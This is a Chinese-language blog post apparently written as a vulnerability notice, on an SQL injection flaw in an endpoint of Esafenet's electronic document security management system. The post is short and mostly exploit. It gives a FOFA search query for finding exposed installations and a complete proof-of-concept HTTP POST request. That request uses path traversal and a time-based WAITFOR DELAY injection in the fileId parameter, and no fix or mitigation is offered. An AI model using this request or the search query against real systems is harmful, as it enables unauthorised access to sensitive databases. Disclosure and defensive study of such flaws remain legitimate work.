SQL注入漏洞

guozi • 2024年6月5日下午3:19 • 行业资讯

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

漏洞信息

漏洞复现

复现信息

语法：

app='亿赛通-电子文档安全管理系统'

测绘搜索

POC：

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1

漏洞复现

复现信息

复现-1

复现-2

更多内容

发现更多

原创文章，作者：guozi，如若转载，请注明出处：https://www.sudun.com/ask/90243.html

赞 (0)

0 0

要避免的 9 个 SQL 错误

上一篇 2024年6月5日下午3:02

SqlSugar，就这个Feel 倍儿爽！

下一篇 2024年6月5日下午3:20

东莞关键词排名为什么如此重要？

东莞关键词排名，这个看似晦涩的名词，在网络行业却是一个备受关注的话题。那么，什么是关键词排名？它又对网站有着怎样的影响？如何提高东莞关键词排名？它又具有怎样的重要性和价值？让我们一…

牛晓晓
行业资讯 2024年4月7日
00
服务器DDoS防御

在当今互联网时代，服务器DDoS攻击已经成为网络安全领域中不可忽视的威胁。随着网络技术的发展，DDoS攻击手段也日益复杂多样，给网络运营商和企业带来了巨大的损失。那么什么是DDoS…

牛晓晓
行业资讯 2024年4月2日
00
行业资讯

一物一码查询系统，一物一码系统价格

一物一码通过对每个产品实现独立管理，达到产品质量的可追溯以及管控，让每一个产品都有源头可溯，可以对问题产品针对性处理。什么是一物一码一物一码即对于每一件商品赋予

小条
2024年6月1日
00
如何选择适合自己的我的世界服务器租用网站？

当今互联网时代，云服务器已经成为了企业和个人建立网站的首选。而对于游戏爱好者来说，如何选择适合自己的我的世界服务器租用网站也是一件重要的事情。那么什么是云服务器？它又与我的世界服务…

牛晓晓
行业资讯 2024年4月10日
00

发表回复